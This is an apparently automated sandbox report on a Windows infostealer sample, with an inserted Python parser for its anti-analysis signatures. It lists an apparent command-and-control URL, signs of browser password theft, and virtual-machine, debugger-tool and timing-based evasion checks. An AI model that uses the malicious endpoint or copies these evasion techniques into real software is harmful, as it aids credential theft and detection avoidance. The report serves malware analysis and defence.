Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 661fW9gxDp.exe, 661fW9gxDp.exe, 00000000.00000003.1537994479.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1571502939.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577599879.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/
Source: 661fW9gxDp.exe, 00000000.00000003.1537994479.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1571502939.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/6
Source: 661fW9gxDp.exe, 00000000.00000002.1577599879.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/L
Source: 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/api
Source: 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/apit
Source: 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat/k
Source: 661fW9gxDp.exe, 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat:443/api
Source: 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat:443/apiy
Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49758 version: TLS 1.2

              System Summary

Source: 661fW9gxDp.exe | Static PE information: section name: (blank)
Source: 661fW9gxDp.exe | Static PE information: section name: .idata
Source: 661fW9gxDp.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Code function: 0_3_00C6E6DC
Source: 661fW9gxDp.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 661fW9gxDp.exe | Static PE information: Section: (blank) ZLIB complexity 0.9974114404965754
Source: 661fW9gxDp.exe | Static PE information: Section: hjbgbzbr ZLIB complexity 0.9944742018026276
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 661fW9gxDp.exe, 00000000.00000003.1424757063.000000000588E000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424463548.00000000058A9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 661fW9gxDp.exe | VirusTotal: Detection: 50%
Source: 661fW9gxDp.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\661fW9gxDp.exe | File read: C:\Users\user\Desktop\661fW9gxDp.exe
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Section loaded: ondemandconnroutehelper.dll (six identical consecutive entries)
Source: 661fW9gxDp.exe | Static file information: File size 1841664 > 1048576
Source: 661fW9gxDp.exe | Static PE information: Raw size of hjbgbzbr is bigger than: 0x100000 < 0x199200

              Data Obfuscation

Source: C:\Users\user\Desktop\661fW9gxDp.exe | Unpacked PE file: 0.2.661fW9gxDp.exe.db0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hjbgbzbr:EW;ijeloniv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hjbgbzbr:EW;ijeloniv:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: 661fW9gxDp.exe | Static PE information: real checksum: 0x1c3d39 should be: 0x1c9e3b
Source: 661fW9gxDp.exe | Static PE information: section name: (blank)
Source: 661fW9gxDp.exe | Static PE information: section name: .idata
Source: 661fW9gxDp.exe | Static PE information: section name: (blank)
Source: 661fW9gxDp.exe | Static PE information: section name: hjbgbzbr
Source: 661fW9gxDp.exe | Static PE information: section name: ijeloniv
Source: 661fW9gxDp.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Code function: 0_3_00CF55C3 push ebp; iretd | 0_3_00CF55C6 (reported 4 times)
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Code function: 0_3_00CF52E0 push edx; iretd | 0_3_00CF52F2 (reported 4 times)
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Code function: 0_3_00CF52FB push edx; iretd | 0_3_00CF52FE (reported 4 times)
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Code function: 0_3_00CF54F8 push ebp; iretd | 0_3_00CF550E (reported 4 times)
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Code function: 0_3_00CF52F7 push edx; iretd | 0_3_00CF52FA (reported 4 times)
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Code function: 0_3_00CF52F3 push edx; iretd | 0_3_00CF52F6 (reported 4 times)
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Code function: 0_3_00CF55F3 push ebp; iretd | 0_3_00CF55F6 (reported 4 times)
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Code function: 0_3_00CF5488 push ebp; iretd | 0_3_00CF54A2 (reported 3 times)
Source: 661fW9gxDp.exe | Static PE information: section name: (blank) entropy: 7.97782039480764
Source: 661fW9gxDp.exe | Static PE information: section name: hjbgbzbr entropy: 7.9528967637667956

              Boot Survival

Source: C:\Users\user\Desktop\661fW9gxDp.exe | Window searched: window name: FilemonClass (reported 2 times)
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Window searched: window name: PROCMON_WINDOW_CLASS (reported 3 times)
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\661fW9gxDp.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
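The window-name searches in the Boot Survival section, the registry and firmware-table probes just above, and the RDTSC interceptor traces that follow are the raw evidence behind the "tries to detect" signatures. When many reports have to be compared, it helps to parse these lines rather than read them. The script below is an added example, not Joe Sandbox code: it recognises the three line shapes as printed in this report, maps each probe to the tool or hypervisor it fingerprints (the mapping is the author's, based on well-known artefacts: the Sysinternals window class names, the Wine-only registry hive, the VirtualBox DSDT table name, and the firmware-table query that exposes hypervisor vendor strings), and stitches the RDTSC traces into chains where one pair's second address is the next pair's first. Treating push/pop, flag twiddles and jumps as filler is a heuristic; the sample lines embedded below are copied from this section, with one long trace shortened.

```python
"""Parse the behaviour lines Joe Sandbox emits for analysis-tool and VM checks
(window searches, registry/firmware probes, RDTSC interceptor traces) into a
short evasion summary. Added example, not part of the report."""
import re

# Constructed input: lines copied from this report section (last trace shortened).
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\661fW9gxDp.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\661fW9gxDp.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: E085D5 second address: E085DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7ADDA second address: F7ADFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F646CD14776h 0x0000000d jmp 00007F646CD14784h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7ADFB second address: F7AE18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F646C53F7B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7D915 second address: F7D9B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F646C53F7B8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f or edx, 618CC1B1h 0x00000015 or edx, dword ptr [ebp+122D3D98h] 0x0000001b popad 0x0000001c push 00000003h 0x0000001e call 00007F646C53F7B9h 0x00000023 mov ecx, edx 0x00000025 pop esi 0x00000026 rdtsc
"""

RDTSC_RE = re.compile(r"RDTSC instruction interceptor: First address: ([0-9A-Fa-f]+) "
                      r"second address: ([0-9A-Fa-f]+) instructions: (.*)$")
PROBE_RES = {
    "window": re.compile(r"Window searched: window name: (\S+)"),
    "registry": re.compile(r"(?:File|Key) opened: (HKEY_\S+)"),
    "sysinfo": re.compile(r"System information queried: (\S+)"),
}
# What each probe fingerprints; keys lower-cased so Regmonclass/RegmonClass both match.
KNOWN = {
    "procmon_window_class": "Sysinternals Process Monitor",
    "filemonclass": "Sysinternals Filemon",
    "regmonclass": "Sysinternals Regmon",
    r"hkey_current_user\software\wine": "Wine (registry hive only Wine creates)",
    r"hkey_local_machine\hardware\acpi\dsdt\vbox__": "VirtualBox (ACPI DSDT table name)",
    "firmwaretableinformation": "SMBIOS/ACPI firmware tables (hypervisor vendor strings)",
}
# Heuristic: these only pad the distance between the two timestamp reads.
JUNK = {"push", "pop", "pushad", "popad", "nop", "clc", "cld", "cmc", "stc", "jmp"}


def clean(line: str) -> str:
    """Drop the 'Jump to behavior' link text the HTML export leaves on a line."""
    return re.sub(r"Jump to (behavior|dropped file)\s*$", "", line.strip())


def parse_trace(listing: str) -> list:
    """'0x00000000 rdtsc 0x00000002 push eax ...' -> ['rdtsc', 'push eax', ...]"""
    return [ins.strip() for ins in re.split(r"\s*0x[0-9a-fA-F]{8}\s+", listing) if ins.strip()]


def is_junk(ins: str) -> bool:
    mnemonic = ins.split()[0]
    return mnemonic in JUNK or mnemonic.startswith("j")


def parse_report(text: str) -> dict:
    """Split report lines into VM/tool probes and RDTSC traces."""
    probes, traces = [], []
    for line in text.splitlines():
        line = clean(line)
        m = RDTSC_RE.search(line)
        if m:
            ins = parse_trace(m.group(3))
            traces.append({"first": int(m.group(1), 16), "second": int(m.group(2), 16),
                           "instructions": ins,
                           "filler_only": all(is_junk(i) for i in ins[1:-1])})
            continue
        for kind, rx in PROBE_RES.items():
            m = rx.search(line)
            if m:
                probes.append({"kind": kind, "value": m.group(1),
                               "target": KNOWN.get(m.group(1).lower(), "unrecognised")})
    return {"probes": probes, "traces": traces}


def rdtsc_chains(traces: list) -> list:
    """Stitch traces whose second address is the next trace's first address;
    a long chain is many timestamp reads wrapped in filler, i.e. a timing check
    that is expensive to single-step through."""
    nxt = {t["first"]: t["second"] for t in traces}
    seconds = set(nxt.values())
    chains = []
    for head in (t["first"] for t in traces if t["first"] not in seconds):
        chain, addr = [head], head
        while addr in nxt and nxt[addr] not in chain:
            addr = nxt[addr]
            chain.append(addr)
        chains.append(chain)
    return chains


def summarise(text: str) -> dict:
    parsed = parse_report(text)
    return {
        "targets": sorted({p["target"] for p in parsed["probes"]}),
        "rdtsc_sites": len({a for t in parsed["traces"] for a in (t["first"], t["second"])}),
        "chains": rdtsc_chains(parsed["traces"]),
        "filler_only_pairs": sum(t["filler_only"] for t in parsed["traces"]),
    }
```

`summarise(text)` on a saved report gives the set of tools and hypervisors the sample looks for, how many distinct RDTSC sites the sandbox intercepted, and which of them form chains. A pair whose inner instructions are all filler is a pure timing measurement; a pair that contains a `call` or a memory operation, like the F7D915 trace, is timing a piece of real work, so both reads belong to the check even though they look like unrelated code.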
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: E085D5 second address: E085DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: E085DB second address: E07EB6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F646C53F7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d clc 0x0000000e push dword ptr [ebp+122D0AA5h] 0x00000014 cld 0x00000015 call dword ptr [ebp+122D29CCh] 0x0000001b pushad 0x0000001c stc 0x0000001d xor eax, eax 0x0000001f jl 00007F646C53F7B8h 0x00000025 jmp 00007F646C53F7B2h 0x0000002a mov edx, dword ptr [esp+28h] 0x0000002e mov dword ptr [ebp+122D3451h], esi 0x00000034 sub dword ptr [ebp+122D3451h], edx 0x0000003a mov dword ptr [ebp+122D3AE0h], eax 0x00000040 cld 0x00000041 mov esi, 0000003Ch 0x00000046 clc 0x00000047 add esi, dword ptr [esp+24h] 0x0000004b jmp 00007F646C53F7AAh 0x00000050 lodsw 0x00000052 mov dword ptr [ebp+122D24F3h], esi 0x00000058 add eax, dword ptr [esp+24h] 0x0000005c cmc 0x0000005d mov ebx, dword ptr [esp+24h] 0x00000061 jnl 00007F646C53F7ACh 0x00000067 nop 0x00000068 pushad 0x00000069 push eax 0x0000006a jl 00007F646C53F7A6h 0x00000070 pop eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7ADDA second address: F7ADFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F646CD14776h 0x0000000d jmp 00007F646CD14784h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7ADFB second address: F7AE18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F646C53F7B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7AE18 second address: F7AE1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7AE1E second address: F7AE24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F79F0A second address: F79F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F646CD14786h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F79F27 second address: F79F4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F646C53F7A6h 0x00000009 jmp 00007F646C53F7B7h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F79F4E second address: F79F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F79F54 second address: F79F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F79F58 second address: F79F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7A245 second address: F7A24A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7A37E second address: F7A393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F646CD1477Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7A393 second address: F7A397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7D8C7 second address: F7D8CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7D8CD second address: F7D8D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7D8D1 second address: F7D8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F646CD14776h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7D8E5 second address: F7D8EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7D8EB second address: F7D915 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F646CD1477Ch 0x00000008 jp 00007F646CD14776h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F646CD14784h 0x0000001c jmp 00007F646CD1477Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7D915 second address: F7D9B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F646C53F7B8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f or edx, 618CC1B1h 0x00000015 or edx, dword ptr [ebp+122D3D98h] 0x0000001b popad 0x0000001c push 00000003h 0x0000001e call 00007F646C53F7B9h 0x00000023 mov ecx, edx 0x00000025 pop esi 0x00000026 mov edx, 23307816h 0x0000002b push 00000000h 0x0000002d mov ch, bh 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F646C53F7A8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b xor ecx, dword ptr [ebp+122D2352h] 0x00000051 call 00007F646C53F7A9h 0x00000056 jmp 00007F646C53F7B4h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
